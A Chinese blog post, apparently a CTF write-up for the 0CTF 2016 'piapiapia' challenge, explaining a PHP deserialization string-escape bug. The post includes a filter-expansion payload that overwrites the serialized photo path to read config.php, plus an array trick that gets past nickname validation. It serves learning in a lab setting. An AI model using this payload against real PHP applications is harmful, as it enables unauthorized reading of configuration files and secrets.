NineOnee

导航

 

反序列化逃逸

前言

  • 环境:buuctf中[0CTF 2016]piapiapia
  • 知识点:反序列化逃逸,php代码审计

做题

进去题目一个登录界面,也没sql注入漏洞,用dirsearch扫一下,扫出源码

index.php用来登录

register.php用来注册

update.php用来更新资料

profile.php用来显示资料

config.php配置文件,注意到有个flag在里面,看来是要读取config.php

class.php定义了类,是主要的代码实现部分

这时我们用seay审计系统自动扫描下


发现有个file_get_contents函数,追踪$profile['photo']

可以看到,这是由$profile反序列而来,而$profile 由show_profile这个函数返回的值得来


而show_profile这个函数又会调用select这个函数


select这个函数会从数据库中取出序列化的profile


显然我们是要利用数据库,来读取config.php了

这时候审计update.php,这里有个序列化函数,看来利用点就是这里,把$profile数组进行序列化,存储在数据中,然后再profile.php反序列化显示出来


跟进update_profile函数


将序列化后的字符串会被filter函数处理

跟进filter函数

implode函数表示以|连接数组以字符串的形式返回,这里相当于正则,将''\ 替换成_ ,将select,insert,update,delete,where 替换成hacker


反序列化逃逸

当对序列化后的字符串进行过滤时,如果把要过滤的字符串替换成字符更多的字符串时,就会造成反序列化逃逸

这里将where替换成hacker 时,字符变成了,显然存在反序列化逃逸漏洞

要利用反序列化漏洞,我们构造的字符肯定也不止一两个,所以要绕过update中的格式限制

if(!preg_match('/^\d{11}$/', $_POST['phone']))
			die('Invalid phone');

		if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
			die('Invalid email');
		
		if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
			die('Invalid nickname');

三个正则里面,前面两个正则都是字符串的头和尾都严格的限制了,并且形式都是只要没有匹配到就die,而nickname这里则是匹配到了就报错,显得不同,而在preg_match里匹配数组返回的是false,strlen一个数组返回的则是null


那么这里我们传入的nickname如果是个数组就可以进行绕过

我们先本地测试正常的序列化该是怎样的

<?php
$profile['phone']='13538732675';
$profile['email']='2592110166@qq.com';
$a=array('NineOne');
$profile['nickname']=$a;
$profile['photo']='upload/test.png';
var_dump(serialize($profile));
?>

a:4:{s:5:"phone";s:11:"13538732675";s:5:"email";s:17:"2592110166@qq.com";s:8:"nickname";a:1:{i:0;s:7:"NineOne";}s:5:"photo";s:15:"upload/test.png";}

我们要造成反序列化使";}s:5:"photo";s:10:"config.php";} 这里有34个字符

假设我们输入where 有x个,则5*x+34=6*x 解得x=34

那么就要构造34个where,payload:

wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}


然后再访问profile.php,f12里的base64解码就是config.php得源码,得到flag

posted on 2020-12-05 15:01  NineOne_E  阅读(157)  评论(0编辑  收藏  举报